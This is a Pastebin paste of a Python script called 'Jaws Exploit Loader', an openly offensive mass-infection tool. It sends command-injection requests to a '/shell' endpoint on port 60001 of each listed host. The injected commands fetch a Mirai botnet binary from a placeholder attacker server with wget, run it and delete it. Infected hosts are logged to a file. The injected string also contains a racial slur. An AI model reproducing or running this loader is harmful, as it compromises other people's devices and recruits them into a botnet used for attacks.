Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Jaws Exploit Loader
- import random, socket, time, sys, requests, re, os
- from multiprocessing import Process
- if len(sys.argv) < 2:
- sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))
- bin_names = ["arm", "arm4", "arm5"]
- list = open(sys.argv[1], "r").readlines()
- #port= sys.argv[2]
- def send_payload(target, port):
- for names in bin_names:
- print("[JAWS/1.0] attempting to infect %s with bin %s" % (target, names))
- url = "http://" + target+":60001/shell?echo >NiGGeR_ || cd /var; echo >NiGGeR_; cp /bin/busybox flakka; >flakka; chmod 777 flakka; wget http://YOURIP/binarizz/mirai.%s -O flakka; chmod 777 flakka;./flakka; rm -rf flakka >/dev/null 2>&1" % (names)
- try:
- output = requests.get(url, timeout=3)
- if output.status_code == int('200'):
- print("[JAWS/1.0] infected %s" % (target))
- file_h = open("jaws_infected.txt", "a+")
- file_h.write(target + "\n")
- file_h.close()
- break
- except:
- pass
- for i in open(sys.argv[1]).readlines():
- try:
- i = i.strip("\r\n")
- t = Process(target=send_payload, args=(i,port,))
- t.start()
- except KeyboardInterrupt:
- os.kill(os.getpid(), 9)
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement